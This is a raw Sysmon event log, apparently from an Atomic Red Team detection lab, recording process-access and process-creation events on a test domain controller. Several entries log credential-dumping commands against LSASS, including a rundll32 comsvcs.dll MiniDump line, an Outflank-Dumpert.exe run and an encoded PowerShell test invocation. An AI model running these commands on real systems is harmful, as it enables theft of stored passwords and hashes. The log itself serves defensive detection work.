15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005551Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005550Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005549Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.112{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CDF-5FA1-2601-000000008801}2392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005548Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.112{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDF-5FA1-2601-000000008801}2392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd378a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd35fe(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30e55e2a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dcc1e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318853d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dc8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30e014b8(wow64) 154100x80000000000000005547Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.127{D28789B6-7CDF-5FA1-2601-000000008801}2392C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 10341000x80000000000000005546Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.081{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005545Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.081{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005544Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.081{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005543Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.081{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005542Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.081{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005541Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.081{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005540Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.081{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005539Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.081{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005538Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.081{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005537Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.081{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CDF-5FA1-2501-000000008801}3352C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005536Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.081{D28789B6-7CDE-5FA1-2101-000000008801}31844472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDF-5FA1-2501-000000008801}3352C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31d4331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4425(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64) 154100x80000000000000005535Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.090{D28789B6-7CDF-5FA1-2501-000000008801}3352C:\Windows\System32\rundll32.exe10.0.14393.0 (rs1_release.160715-1616)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" C:\windows\System32\comsvcs.dll MiniDump 868 C:\Users\ADMINI~1\AppData\Local\Temp\lsass-comsvcs.dmp fullC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=C7645D43451C6D94D87F4D07BDE59C89,SHA256=495BBA47FC43EE23054FCD419F2F00457162D1C04296900C6AEA551102A810F3,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{D28789B6-7CDE-5FA1-2101-000000008801}3184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full} 10341000x80000000000000005811Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.818{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE0-5FA1-3701-000000008801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005810Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.818{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005809Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 